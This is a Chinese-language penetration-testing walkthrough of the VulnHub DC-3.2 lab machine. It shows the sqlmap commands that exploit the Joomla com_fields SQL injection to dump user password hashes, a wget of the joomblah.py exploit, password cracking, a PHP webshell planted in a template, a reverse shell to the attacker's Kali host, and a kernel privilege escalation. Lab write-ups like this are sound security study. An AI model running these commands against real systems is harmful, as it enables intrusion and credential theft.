vulnhub DC:3.2渗透笔记

kali ip :192.168.20.130

靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/

信息收集

扫描靶机ip以及开放端口
vulnhub DC:3.2渗透笔记_第1张图片
vulnhub DC:3.2渗透笔记_第2张图片
开放了80端口访问一下

vulnhub DC:3.2渗透笔记_第3张图片

Welcome to DC-3.
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge.  :-)

欢迎来到 DC-3。
这一次,只有一面旗帜,一个入口,没有任何线索。
要获得flag,您显然必须获得 root 权限。
如何成为 root 取决于您——当然,也取决于系统。
祝你好运 - 我希望你喜欢这个小挑战。 :-)

意思就是需要root权限了

查看Wapplayzer信息如下

vulnhub DC:3.2渗透笔记_第4张图片

使用的Joomla的CMS,使用joomscan(Joomla漏洞扫描器)扫描器扫描

joomscan --url http://192.168.20.129/

vulnhub DC:3.2渗透笔记_第5张图片

后台登录界面已发现

vulnhub DC:3.2渗透笔记_第6张图片

漏洞攻击

使用searchsploit搜索Joomla的漏洞

vulnhub DC:3.2渗透笔记_第7张图片

查看一下42033.txt文件

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

vulnhub DC:3.2渗透笔记_第8张图片

所以可以利用sqlmap进行注入

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

vulnhub DC:3.2渗透笔记_第9张图片

查看joomladb数据库

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

vulnhub DC:3.2渗透笔记_第10张图片

有user表,查看#__users的列

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

vulnhub DC:3.2渗透笔记_第11张图片

查看表name和password的值

sqlmap -u "http://192.168.20.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

得到加密密码

vulnhub DC:3.2渗透笔记_第12张图片

还有一种简单的方法,使用joomblash.py脚本

wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py

直接攻击即可得到加密的密码

vulnhub DC:3.2渗透笔记_第13张图片

使用john爆破密码,我将密文内容放在1文件中

vulnhub DC:3.2渗透笔记_第14张图片

得到密码snoopy,登录到系统

vulnhub DC:3.2渗透笔记_第15张图片

此处发现可以新增页面
vulnhub DC:3.2渗透笔记_第16张图片

写入一句话

vulnhub DC:3.2渗透笔记_第17张图片

木马路径http://192.168.20.129/templates/beez3/shell.php

蚁剑连接

vulnhub DC:3.2渗透笔记_第18张图片

当前权限位www-data

vulnhub DC:3.2渗透笔记_第19张图片

编写反弹shell,监听1234端口,反弹shell至kali,shell内容用的kali自带的位于/usr/share/webshells/php/php-reverse-shell.php并且修改参数
vulnhub DC:3.2渗透笔记_第20张图片
vulnhub DC:3.2渗透笔记_第21张图片

连接成功,写入交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

提权

使用uname -a发现是ubuntu16.04

在这里插入图片描述

使用searchsploit发现一个漏洞可以提权

vulnhub DC:3.2渗透笔记_第22张图片

查看txt文件

vulnhub DC:3.2渗透笔记_第23张图片

将压缩包下载下来上传服务器解压运行即可(这里我偷几张图,我没科学上网工具……)

vulnhub DC:3.2渗透笔记_第24张图片

vulnhub DC:3.2渗透笔记_第25张图片
vulnhub DC:3.2渗透笔记_第26张图片

你可能感兴趣的:(vulnhub靶机渗透,php,安全,linux)